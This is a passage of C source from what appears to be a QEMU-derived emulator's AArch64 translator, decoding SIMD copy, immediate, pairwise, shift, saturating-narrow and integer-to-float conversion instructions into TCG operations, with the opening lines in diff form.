clear_vec_high(s, rd); + } +} + +/* C6.3.150 INS (Element) + * + * 31 21 20 16 15 14 11 10 9 5 4 0 + * +-----------------------+--------+------------+---+------+------+ + * | 0 1 1 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | + * +-----------------------+--------+------------+---+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + * index: encoded in imm5<4:size+1> + */ +static void handle_simd_inse(DisasContext *s, int rd, int rn, + int imm4, int imm5) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = ctz32(imm5); + int src_index, dst_index; + TCGv_i64 tmp; + + if (size > 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + dst_index = extract32(imm5, 1+size, 5); + src_index = extract32(imm4, size, 4); + + tmp = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tmp, rn, src_index, size); + write_vec_element(s, tmp, rd, dst_index, size); + + tcg_temp_free_i64(tcg_ctx, tmp); +} + + +/* C6.3.151 INS (General) + * + * 31 21 20 16 15 10 9 5 4 0 + * 
+-----------------------+--------+-------------+------+------+ + * | 0 1 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 0 1 1 1 | Rn | Rd | + * +-----------------------+--------+-------------+------+------+ + * + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + * index: encoded in imm5<4:size+1> + */ +static void handle_simd_insg(DisasContext *s, int rd, int rn, int imm5) +{ + int size = ctz32(imm5); + int idx; + + if (size > 3) { + unallocated_encoding(s); + return; + } + + if (!fp_access_check(s)) { + return; + } + + idx = extract32(imm5, 1 + size, 4 - size); + write_vec_element(s, cpu_reg(s, rn), rd, idx, size); +} + +/* + * C6.3.321 UMOV (General) + * C6.3.237 SMOV (General) + * + * 31 30 29 21 20 16 15 12 10 9 5 4 0 + * +---+---+-------------------+--------+-------------+------+------+ + * | 0 | Q | 0 0 1 1 1 0 0 0 0 | imm5 | 0 0 1 U 1 1 | Rn | Rd | + * +---+---+-------------------+--------+-------------+------+------+ + * + * U: unsigned when set + * size: encoded in imm5 (see ARM ARM LowestSetBit()) + */ +static void handle_simd_umov_smov(DisasContext *s, int is_q, int is_signed, + int rn, int rd, int imm5) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int size = ctz32(imm5); + int element; + TCGv_i64 tcg_rd; + + /* Check for UnallocatedEncodings */ + if (is_signed) { + if (size > 2 || (size == 2 && !is_q)) { + unallocated_encoding(s); + return; + } + } else { + if (size > 3 + || (size < 3 && is_q) + || (size == 3 && !is_q)) { + unallocated_encoding(s); + return; + } + } + + if (!fp_access_check(s)) { + return; + } + + element = extract32(imm5, 1+size, 4); + + tcg_rd = cpu_reg(s, rd); + read_vec_element(s, tcg_rd, rn, element, size | (is_signed ? 
MO_SIGN : 0)); + if (is_signed && !is_q) { + tcg_gen_ext32u_i64(tcg_ctx, tcg_rd, tcg_rd); + } +} + +/* C3.6.5 AdvSIMD copy + * 31 30 29 28 21 20 16 15 14 11 10 9 5 4 0 + * +---+---+----+-----------------+------+---+------+---+------+------+ + * | 0 | Q | op | 0 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 | Rn | Rd | + * +---+---+----+-----------------+------+---+------+---+------+------+ + */ +static void disas_simd_copy(DisasContext *s, uint32_t insn) +{ + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int imm4 = extract32(insn, 11, 4); + int op = extract32(insn, 29, 1); + int is_q = extract32(insn, 30, 1); + int imm5 = extract32(insn, 16, 5); + + if (op) { + if (is_q) { + /* INS (element) */ + handle_simd_inse(s, rd, rn, imm4, imm5); + } else { + unallocated_encoding(s); + } + } else { + switch (imm4) { + case 0: + /* DUP (element - vector) */ + handle_simd_dupe(s, is_q, rd, rn, imm5); + break; + case 1: + /* DUP (general) */ + handle_simd_dupg(s, is_q, rd, rn, imm5); + break; + case 3: + if (is_q) { + /* INS (general) */ + handle_simd_insg(s, rd, rn, imm5); + } else { + unallocated_encoding(s); + } + break; + case 5: + case 7: + /* UMOV/SMOV (is_q indicates 32/64; imm4 indicates signedness) */ + handle_simd_umov_smov(s, is_q, (imm4 == 5), rn, rd, imm5); + break; + default: + unallocated_encoding(s); + break; + } + } +} + +/* C3.6.6 AdvSIMD modified immediate + * 31 30 29 28 19 18 16 15 12 11 10 9 5 4 0 + * +---+---+----+---------------------+-----+-------+----+---+-------+------+ + * | 0 | Q | op | 0 1 1 1 1 0 0 0 0 0 | abc | cmode | o2 | 1 | defgh | Rd | + * +---+---+----+---------------------+-----+-------+----+---+-------+------+ + * + * There are a number of operations that can be carried out here: + * MOVI - move (shifted) imm into register + * MVNI - move inverted (shifted) imm into register + * ORR - bitwise OR of (shifted) imm with register + * BIC - bitwise clear of (shifted) imm with register + */ +static void 
disas_simd_mod_imm(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int rd = extract32(insn, 0, 5);
    int cmode = extract32(insn, 12, 4);
    int cmode_3_1 = extract32(cmode, 1, 3);
    int cmode_0 = extract32(cmode, 0, 1);
    int o2 = extract32(insn, 11, 1);
    uint64_t abcdefgh = extract32(insn, 5, 5) | (extract32(insn, 16, 3) << 5);
    bool is_neg = extract32(insn, 29, 1);
    bool is_q = extract32(insn, 30, 1);
    uint64_t imm = 0;
    TCGv_i64 tcg_rd, tcg_imm;
    int i;

    if (o2 != 0 || ((cmode == 0xf) && is_neg && !is_q)) {
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    /* See AdvSIMDExpandImm() in ARM ARM */
    switch (cmode_3_1) {
    case 0: /* Replicate(Zeros(24):imm8, 2) */
    case 1: /* Replicate(Zeros(16):imm8:Zeros(8), 2) */
    case 2: /* Replicate(Zeros(8):imm8:Zeros(16), 2) */
    case 3: /* Replicate(imm8:Zeros(24), 2) */
    {
        int shift = cmode_3_1 * 8;
        imm = bitfield_replicate(abcdefgh << shift, 32);
        break;
    }
    case 4: /* Replicate(Zeros(8):imm8, 4) */
    case 5: /* Replicate(imm8:Zeros(8), 4) */
    {
        int shift = (cmode_3_1 & 0x1) * 8;
        imm = bitfield_replicate(abcdefgh << shift, 16);
        break;
    }
    case 6:
        if (cmode_0) {
            /* Replicate(Zeros(8):imm8:Ones(16), 2) */
            imm = (abcdefgh << 16) | 0xffff;
        } else {
            /* Replicate(Zeros(16):imm8:Ones(8), 2) */
            imm = (abcdefgh << 8) | 0xff;
        }
        imm = bitfield_replicate(imm, 32);
        break;
    case 7:
        if (!cmode_0 && !is_neg) {
            /* Replicate imm8 into each byte */
            imm = bitfield_replicate(abcdefgh, 8);
        } else if (!cmode_0 && is_neg) {
            /* Expand each imm8 bit into a whole byte (0x00 or 0xff) */
            int i;
            imm = 0;
            for (i = 0; i < 8; i++) {
                if ((abcdefgh) & (1ULL << i)) {
                    imm |= 0xffULL << (i * 8);
                }
            }
        } else if (cmode_0) {
            if (is_neg) {
                /* FMOV (vector, immediate) - double-precision expansion */
                imm = (abcdefgh & 0x3f) << 48;
                if (abcdefgh & 0x80) {
                    imm |= 0x8000000000000000ULL;
                }
                if (abcdefgh & 0x40) {
                    imm |= 0x3fc0000000000000ULL;
                } else {
                    imm |= 0x4000000000000000ULL;
                }
            } else {
                /* FMOV (vector, immediate) - single-precision expansion,
                 * replicated into both 32-bit halves.
                 */
                imm = (abcdefgh & 0x3f) << 19;
                if (abcdefgh & 0x80) {
                    imm |= 0x80000000;
                }
                if (abcdefgh & 0x40) {
                    imm |= 0x3e000000;
                } else {
                    imm |= 0x40000000;
                }
                imm |= (imm << 32);
            }
        }
        break;
    }

    if (cmode_3_1 != 7 && is_neg) {
        imm = ~imm;
    }

    tcg_imm = tcg_const_i64(tcg_ctx, imm);
    tcg_rd = new_tmp_a64(s);

    /* Operate on each 64-bit half of the vector register in turn */
    for (i = 0; i < 2; i++) {
        int foffs = i ? fp_reg_hi_offset(s, rd) : fp_reg_offset(s, rd, MO_64);

        if (i == 1 && !is_q) {
            /* non-quad ops clear high half of vector */
            tcg_gen_movi_i64(tcg_ctx, tcg_rd, 0);
        } else if ((cmode & 0x9) == 0x1 || (cmode & 0xd) == 0x9) {
            /* cmode patterns 0xx1 / 10x1: ORR or BIC with the old value */
            tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, foffs);
            if (is_neg) {
                /* AND (BIC) */
                tcg_gen_and_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm);
            } else {
                /* ORR */
                tcg_gen_or_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_imm);
            }
        } else {
            /* MOVI */
            tcg_gen_mov_i64(tcg_ctx, tcg_rd, tcg_imm);
        }
        tcg_gen_st_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, foffs);
    }

    tcg_temp_free_i64(tcg_ctx, tcg_imm);
}

/* C3.6.7 AdvSIMD scalar copy
 *  31 30  29  28             21 20  16 15  14  11 10  9    5 4    0
 * +-----+----+-----------------+------+---+------+---+------+------+
 * | 0 1 | op | 1 1 1 1 0 0 0 0 | imm5 | 0 | imm4 | 1 |  Rn  |  Rd  |
 * +-----+----+-----------------+------+---+------+---+------+------+
 */
static void disas_simd_scalar_copy(DisasContext *s, uint32_t insn)
{
    int rd = extract32(insn, 0, 5);
    int rn = extract32(insn, 5, 5);
    int imm4 = extract32(insn, 11, 4);
    int imm5 = extract32(insn, 16, 5);
    int op = extract32(insn, 29, 1);

    if (op != 0 || imm4 != 0) {
        unallocated_encoding(s);
        return;
    }

    /* DUP (element, scalar) */
    handle_simd_dupes(s, rd, rn, imm5);
}

/* C3.6.8 AdvSIMD scalar pairwise
 *  31 30  29 28   24 23  22 21       17 16    12 11 10 9    5 4    0
 * +-----+---+-----------+------+-----------+--------+-----+------+------+
 * | 0 1 | U | 1 1 1 1 0 | size | 1 1 0 0 0 | opcode | 1 0 |  Rn  |  Rd  |
 * +-----+---+-----------+------+-----------+--------+-----+------+------+
 */
static void
disas_simd_scalar_pairwise(DisasContext *s, uint32_t insn)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int u = extract32(insn, 29, 1);
    int size = extract32(insn, 22, 2);
    int opcode = extract32(insn, 12, 5);
    int rn = extract32(insn, 5, 5);
    int rd = extract32(insn, 0, 5);
    TCGv_ptr fpst;

    /* For some ops (the FP ones), size[1] is part of the encoding.
     * For ADDP strictly it is not but size[1] is always 1 for valid
     * encodings.
     */
    opcode |= (extract32(size, 1, 1) << 5);

    switch (opcode) {
    case 0x3b: /* ADDP */
        if (u || size != 3) {
            unallocated_encoding(s);
            return;
        }
        if (!fp_access_check(s)) {
            return;
        }

        /* Integer op: no fpstatus needed; sentinel tells the cleanup below */
        TCGV_UNUSED_PTR(fpst);
        break;
    case 0xc: /* FMAXNMP */
    case 0xd: /* FADDP */
    case 0xf: /* FMAXP */
    case 0x2c: /* FMINNMP */
    case 0x2f: /* FMINP */
        /* FP op, size[0] is 32 or 64 bit */
        if (!u) {
            unallocated_encoding(s);
            return;
        }
        if (!fp_access_check(s)) {
            return;
        }

        size = extract32(size, 0, 1) ? 3 : 2;
        fpst = get_fpstatus_ptr(tcg_ctx);
        break;
    default:
        unallocated_encoding(s);
        return;
    }

    if (size == 3) {
        /* 64-bit elements: reduce the two halves of the source register */
        TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx);
        TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx);
        TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx);

        read_vec_element(s, tcg_op1, rn, 0, MO_64);
        read_vec_element(s, tcg_op2, rn, 1, MO_64);

        switch (opcode) {
        case 0x3b: /* ADDP */
            tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_op1, tcg_op2);
            break;
        case 0xc: /* FMAXNMP */
            gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0xd: /* FADDP */
            gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0xf: /* FMAXP */
            gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0x2c: /* FMINNMP */
            gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0x2f: /* FMINP */
            gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        default:
            g_assert_not_reached();
        }

        write_fp_dreg(s, rd, tcg_res);

        tcg_temp_free_i64(tcg_ctx, tcg_op1);
        tcg_temp_free_i64(tcg_ctx, tcg_op2);
        tcg_temp_free_i64(tcg_ctx, tcg_res);
    } else {
        /* 32-bit elements: FP-only (ADDP was filtered to size == 3 above) */
        TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx);

        read_vec_element_i32(s, tcg_op1, rn, 0, MO_32);
        read_vec_element_i32(s, tcg_op2, rn, 1, MO_32);

        switch (opcode) {
        case 0xc: /* FMAXNMP */
            gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0xd: /* FADDP */
            gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0xf: /* FMAXP */
            gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0x2c: /* FMINNMP */
            gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        case 0x2f: /* FMINP */
            gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst);
            break;
        default:
            g_assert_not_reached();
        }

        write_fp_sreg(s, rd, tcg_res);

        tcg_temp_free_i32(tcg_ctx, tcg_op1);
        tcg_temp_free_i32(tcg_ctx, tcg_op2);
        tcg_temp_free_i32(tcg_ctx, tcg_res);
    }

    if (!TCGV_IS_UNUSED_PTR(fpst)) {
        tcg_temp_free_ptr(tcg_ctx, fpst);
    }
}

/*
 * Common SSHR[RA]/USHR[RA] - Shift right (optional rounding/accumulate)
 *
 * This code handles the common shifting code and is used by both
 * the vector and scalar code.
 */
static void handle_shri_with_rndacc(DisasContext *s, TCGv_i64 tcg_res, TCGv_i64 tcg_src,
                                    TCGv_i64 tcg_rnd, bool accumulate,
                                    bool is_u, int size, int shift)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    bool extended_result = false;
    /* An unused tcg_rnd sentinel means "no rounding" */
    bool round = !TCGV_IS_UNUSED_I64(tcg_rnd);
    int ext_lshift = 0;
    TCGv_i64 tcg_src_hi;

    if (round && size == 3) {
        /* Rounding a 64-bit element can carry out of bit 63, so the
         * intermediate value needs more than 64 bits of precision.
         */
        extended_result = true;
        ext_lshift = 64 - shift;
        tcg_src_hi = tcg_temp_new_i64(tcg_ctx);
    } else if (shift == 64) {
        if (!accumulate && is_u) {
            /* result is zero */
            tcg_gen_movi_i64(tcg_ctx, tcg_res, 0);
            return;
        }
    }

    /* Deal with the rounding step */
    if (round) {
        if (extended_result) {
            TCGv_i64 tcg_zero = tcg_const_i64(tcg_ctx, 0);
            if (!is_u) {
                /* take care of sign extending tcg_res */
                tcg_gen_sari_i64(tcg_ctx, tcg_src_hi, tcg_src, 63);
                tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi,
                                 tcg_src, tcg_src_hi,
                                 tcg_rnd, tcg_zero);
            } else {
                tcg_gen_add2_i64(tcg_ctx, tcg_src, tcg_src_hi,
                                 tcg_src, tcg_zero,
                                 tcg_rnd, tcg_zero);
            }
            tcg_temp_free_i64(tcg_ctx, tcg_zero);
        } else {
            tcg_gen_add_i64(tcg_ctx, tcg_src, tcg_src, tcg_rnd);
        }
    }

    /* Now do the shift right */
    if (round && extended_result) {
        /* extended case, >64 bit precision required */
        if (ext_lshift == 0) {
            /* special case, only high bits matter */
            tcg_gen_mov_i64(tcg_ctx, tcg_src, tcg_src_hi);
        } else {
            tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift);
            tcg_gen_shli_i64(tcg_ctx, tcg_src_hi, tcg_src_hi, ext_lshift);
            tcg_gen_or_i64(tcg_ctx, tcg_src, tcg_src, tcg_src_hi);
        }
    } else {
        if (is_u) {
            if (shift == 64) {
                /* essentially shifting in 64 zeros */
                tcg_gen_movi_i64(tcg_ctx, tcg_src, 0);
            } else {
                tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift);
            }
        } else {
            if (shift == 64) {
                /* effectively extending the sign-bit */
                tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, 63);
            } else {
                tcg_gen_sari_i64(tcg_ctx, tcg_src, tcg_src, shift);
            }
        }
    }

    if (accumulate) {
        tcg_gen_add_i64(tcg_ctx, tcg_res, tcg_res, tcg_src);
    } else {
        tcg_gen_mov_i64(tcg_ctx, tcg_res, tcg_src);
    }

    if (extended_result) {
        tcg_temp_free_i64(tcg_ctx, tcg_src_hi);
    }
}

/* Common SHL/SLI - Shift left with an optional insert */
static void handle_shli_with_ins(TCGContext *tcg_ctx, TCGv_i64 tcg_res, TCGv_i64 tcg_src,
                                 bool insert, int shift)
{
    if (insert) { /* SLI */
        tcg_gen_deposit_i64(tcg_ctx, tcg_res, tcg_res, tcg_src, shift, 64 - shift);
    } else { /* SHL */
        tcg_gen_shli_i64(tcg_ctx, tcg_res, tcg_src, shift);
    }
}

/* SRI: shift right with insert */
static void handle_shri_with_ins(TCGContext *tcg_ctx, TCGv_i64 tcg_res, TCGv_i64 tcg_src,
                                 int size, int shift)
{
    int esize = 8 << size;

    /* shift count same as element size is valid but does nothing;
     * special case to avoid potential shift by 64.
     */
    if (shift != esize) {
        tcg_gen_shri_i64(tcg_ctx, tcg_src, tcg_src, shift);
        tcg_gen_deposit_i64(tcg_ctx, tcg_res, tcg_res, tcg_src, 0, esize - shift);
    }
}

/* SSHR[RA]/USHR[RA] - Scalar shift right (optional rounding/accumulate) */
static void handle_scalar_simd_shri(DisasContext *s,
                                    bool is_u, int immh, int immb,
                                    int opcode, int rn, int rd)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    const int size = 3;
    int immhb = immh << 3 | immb;
    /* Right-shift amount is encoded as (2 * esize) - immhb */
    int shift = 2 * (8 << size) - immhb;
    bool accumulate = false;
    bool round = false;
    bool insert = false;
    TCGv_i64 tcg_rn;
    TCGv_i64 tcg_rd;
    TCGv_i64 tcg_round;

    if (!extract32(immh, 3, 1)) {
        /* Scalar form is 64-bit only: immh<3> must be set */
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    switch (opcode) {
    case 0x02: /* SSRA / USRA (accumulate) */
        accumulate = true;
        break;
    case 0x04: /* SRSHR / URSHR (rounding) */
        round = true;
        break;
    case 0x06: /* SRSRA / URSRA (accum + rounding) */
        accumulate = round = true;
        break;
    case 0x08: /* SRI */
        insert = true;
        break;
    }

    if (round) {
        uint64_t round_const = 1ULL << (shift - 1);
        tcg_round =
tcg_const_i64(tcg_ctx, round_const);
    } else {
        /* Unused sentinel: handle_shri_with_rndacc treats it as "no rounding" */
        TCGV_UNUSED_I64(tcg_round);
    }

    tcg_rn = read_fp_dreg(s, rn);
    /* SRA/SRI read the old destination so the result can merge into it */
    tcg_rd = (accumulate || insert) ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx);

    if (insert) {
        handle_shri_with_ins(tcg_ctx, tcg_rd, tcg_rn, size, shift);
    } else {
        handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round,
                                accumulate, is_u, size, shift);
    }

    write_fp_dreg(s, rd, tcg_rd);

    tcg_temp_free_i64(tcg_ctx, tcg_rn);
    tcg_temp_free_i64(tcg_ctx, tcg_rd);
    if (round) {
        tcg_temp_free_i64(tcg_ctx, tcg_round);
    }
}

/* SHL/SLI - Scalar shift left */
static void handle_scalar_simd_shli(DisasContext *s, bool insert,
                                    int immh, int immb, int opcode,
                                    int rn, int rd)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int size = 32 - clz32(immh) - 1;
    int immhb = immh << 3 | immb;
    /* Left-shift amount is encoded as immhb - esize */
    int shift = immhb - (8 << size);
    TCGv_i64 tcg_rn = new_tmp_a64(s);
    TCGv_i64 tcg_rd = new_tmp_a64(s);

    if (!extract32(immh, 3, 1)) {
        /* Scalar form is 64-bit only: immh<3> must be set */
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    tcg_rn = read_fp_dreg(s, rn);
    /* SLI merges into the old destination value */
    tcg_rd = insert ? read_fp_dreg(s, rd) : tcg_temp_new_i64(tcg_ctx);

    handle_shli_with_ins(tcg_ctx, tcg_rd, tcg_rn, insert, shift);

    write_fp_dreg(s, rd, tcg_rd);

    tcg_temp_free_i64(tcg_ctx, tcg_rn);
    tcg_temp_free_i64(tcg_ctx, tcg_rd);
}

/* SQSHRN/SQSHRUN - Saturating (signed/unsigned) shift right with
 * (signed/unsigned) narrowing */
static void handle_vec_simd_sqshrn(DisasContext *s, bool is_scalar, bool is_q,
                                   bool is_u_shift, bool is_u_narrow,
                                   int immh, int immb, int opcode,
                                   int rn, int rd)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int immhb = immh << 3 | immb;
    int size = 32 - clz32(immh) - 1;
    int esize = 8 << size;
    int shift = (2 * esize) - immhb;
    int elements = is_scalar ? 1 : (64 / esize);
    /* Odd opcodes are the rounding variants (SQRSHRN etc.) */
    bool round = extract32(opcode, 0, 1);
    TCGMemOp ldop = (size + 1) | (is_u_shift ? 0 : MO_SIGN);
    TCGv_i64 tcg_rn, tcg_rd, tcg_round;
    TCGv_i32 tcg_rd_narrowed;
    TCGv_i64 tcg_final;

    /* Narrowing helpers indexed by source element size; the second
     * column of the signed table is the signed->unsigned (SQSHRUN) form.
     */
    static NeonGenNarrowEnvFn * const signed_narrow_fns[4][2] = {
        { gen_helper_neon_narrow_sat_s8,
          gen_helper_neon_unarrow_sat8 },
        { gen_helper_neon_narrow_sat_s16,
          gen_helper_neon_unarrow_sat16 },
        { gen_helper_neon_narrow_sat_s32,
          gen_helper_neon_unarrow_sat32 },
        { NULL, NULL },
    };
    static NeonGenNarrowEnvFn * const unsigned_narrow_fns[4] = {
        gen_helper_neon_narrow_sat_u8,
        gen_helper_neon_narrow_sat_u16,
        gen_helper_neon_narrow_sat_u32,
        NULL
    };
    NeonGenNarrowEnvFn *narrowfn;

    int i;

    assert(size < 4);

    if (extract32(immh, 3, 1)) {
        /* immh<3> set would mean a 64->128 narrow: unallocated */
        unallocated_encoding(s);
        return;
    }

    if (!fp_access_check(s)) {
        return;
    }

    if (is_u_shift) {
        narrowfn = unsigned_narrow_fns[size];
    } else {
        narrowfn = signed_narrow_fns[size][is_u_narrow ? 1 : 0];
    }

    tcg_rn = tcg_temp_new_i64(tcg_ctx);
    tcg_rd = tcg_temp_new_i64(tcg_ctx);
    tcg_rd_narrowed = tcg_temp_new_i32(tcg_ctx);
    tcg_final = tcg_const_i64(tcg_ctx, 0);

    if (round) {
        uint64_t round_const = 1ULL << (shift - 1);
        tcg_round = tcg_const_i64(tcg_ctx, round_const);
    } else {
        TCGV_UNUSED_I64(tcg_round);
    }

    for (i = 0; i < elements; i++) {
        read_vec_element(s, tcg_rn, rn, i, ldop);
        handle_shri_with_rndacc(s, tcg_rd, tcg_rn, tcg_round,
                                false, is_u_shift, size+1, shift);
        narrowfn(tcg_ctx, tcg_rd_narrowed, tcg_ctx->cpu_env, tcg_rd);
        tcg_gen_extu_i32_i64(tcg_ctx, tcg_rd, tcg_rd_narrowed);
        /* Accumulate the narrowed elements into a single 64-bit value */
        tcg_gen_deposit_i64(tcg_ctx, tcg_final, tcg_final, tcg_rd, esize * i, esize);
    }

    if (!is_q) {
        /* Non-"2" form writes the low half and zeroes the high half */
        clear_vec_high(s, rd);
        write_vec_element(s, tcg_final, rd, 0, MO_64);
    } else {
        /* The "2" (second-half) form writes the high 64 bits */
        write_vec_element(s, tcg_final, rd, 1, MO_64);
    }

    if (round) {
        tcg_temp_free_i64(tcg_ctx, tcg_round);
    }
    tcg_temp_free_i64(tcg_ctx, tcg_rn);
    tcg_temp_free_i64(tcg_ctx, tcg_rd);
    tcg_temp_free_i32(tcg_ctx, tcg_rd_narrowed);
    tcg_temp_free_i64(tcg_ctx, tcg_final);
    return;
}

/* SQSHLU, UQSHL, SQSHL: saturating left shifts */
static void handle_simd_qshl(DisasContext *s, bool scalar, bool is_q,
                             bool src_unsigned, bool dst_unsigned,
                             int immh, int immb, int rn, int rd)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    int immhb = immh << 3 | immb;
    int size = 32 - clz32(immh) - 1;
    int shift = immhb - (8 << size);
    int pass;

    assert(immh != 0);
    assert(!(scalar && is_q));

    if (!scalar) {
        if (!is_q && extract32(immh, 3, 1)) {
            unallocated_encoding(s);
            return;
        }

        /* Since we use the variable-shift helpers we must
         * replicate the shift count into each element of
         * the tcg_shift value.
         */
        switch (size) {
        case 0:
            shift |= shift << 8;
            /* fall through */
        case 1:
            shift |= shift << 16;
            break;
        case 2:
        case 3:
            break;
        default:
            g_assert_not_reached();
        }
    }

    if (!fp_access_check(s)) {
        return;
    }

    if (size == 3) {
        TCGv_i64 tcg_shift = tcg_const_i64(tcg_ctx, shift);
        /* Indexed [src_unsigned][dst_unsigned]; unsigned->signed is invalid */
        static NeonGenTwo64OpEnvFn * const fns[2][2] = {
            { gen_helper_neon_qshl_s64, gen_helper_neon_qshlu_s64 },
            { NULL, gen_helper_neon_qshl_u64 },
        };
        NeonGenTwo64OpEnvFn *genfn = fns[src_unsigned][dst_unsigned];
        int maxpass = is_q ? 2 : 1;

        for (pass = 0; pass < maxpass; pass++) {
            TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx);

            read_vec_element(s, tcg_op, rn, pass, MO_64);
            genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift);
            write_vec_element(s, tcg_op, rd, pass, MO_64);

            tcg_temp_free_i64(tcg_ctx, tcg_op);
        }
        tcg_temp_free_i64(tcg_ctx, tcg_shift);

        if (!is_q) {
            clear_vec_high(s, rd);
        }
    } else {
        TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, shift);
        static NeonGenTwoOpEnvFn * const fns[2][2][3] = {
            {
                { gen_helper_neon_qshl_s8,
                  gen_helper_neon_qshl_s16,
                  gen_helper_neon_qshl_s32 },
                { gen_helper_neon_qshlu_s8,
                  gen_helper_neon_qshlu_s16,
                  gen_helper_neon_qshlu_s32 }
            }, {
                { NULL, NULL, NULL },
                { gen_helper_neon_qshl_u8,
                  gen_helper_neon_qshl_u16,
                  gen_helper_neon_qshl_u32 }
            }
        };
        NeonGenTwoOpEnvFn *genfn = fns[src_unsigned][dst_unsigned][size];
        TCGMemOp memop = scalar ? size : MO_32;
        int maxpass = scalar ? 1 : is_q ? 4 : 2;

        for (pass = 0; pass < maxpass; pass++) {
            TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx);

            read_vec_element_i32(s, tcg_op, rn, pass, memop);
            genfn(tcg_ctx, tcg_op, tcg_ctx->cpu_env, tcg_op, tcg_shift);
            if (scalar) {
                /* Zero-extend the narrow result before writing the S reg */
                switch (size) {
                case 0:
                    tcg_gen_ext8u_i32(tcg_ctx, tcg_op, tcg_op);
                    break;
                case 1:
                    tcg_gen_ext16u_i32(tcg_ctx, tcg_op, tcg_op);
                    break;
                case 2:
                    break;
                default:
                    g_assert_not_reached();
                }
                write_fp_sreg(s, rd, tcg_op);
            } else {
                write_vec_element_i32(s, tcg_op, rd, pass, MO_32);
            }

            tcg_temp_free_i32(tcg_ctx, tcg_op);
        }
        tcg_temp_free_i32(tcg_ctx, tcg_shift);

        if (!is_q && !scalar) {
            clear_vec_high(s, rd);
        }
    }
}

/* Common vector code for handling integer to FP conversion */
static void handle_simd_intfp_conv(DisasContext *s, int rd, int rn,
                                   int elements, int is_signed,
                                   int fracbits, int size)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    bool is_double = size == 3 ?
true : false;
    TCGv_ptr tcg_fpst = get_fpstatus_ptr(tcg_ctx);
    TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, fracbits);
    TCGv_i64 tcg_int = tcg_temp_new_i64(tcg_ctx);
    TCGMemOp mop = size | (is_signed ? MO_SIGN : 0);
    int pass;

    for (pass = 0; pass < elements; pass++) {
        read_vec_element(s, tcg_int, rn, pass, mop);

        if (is_double) {
            TCGv_i64 tcg_double = tcg_temp_new_i64(tcg_ctx);
            if (is_signed) {
                gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int,
                                     tcg_shift, tcg_fpst);
            } else {
                gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int,
                                     tcg_shift, tcg_fpst);
            }
            if (elements == 1) {
                /* Scalar: write_fp_dreg also clears the high half */
                write_fp_dreg(s, rd, tcg_double);
            } else {
                write_vec_element(s, tcg_double, rd, pass, MO_64);
            }
            tcg_temp_free_i64(tcg_ctx, tcg_double);
        } else {
            TCGv_i32 tcg_single = tcg_temp_new_i32(tcg_ctx);
            if (is_signed) {
                gen_helper_vfp_sqtos(tcg_ctx, tcg_single, tcg_int,
                                     tcg_shift, tcg_fpst);
            } else {
                gen_helper_vfp_uqtos(tcg_ctx, tcg_single, tcg_int,
                                     tcg_shift, tcg_fpst);
            }
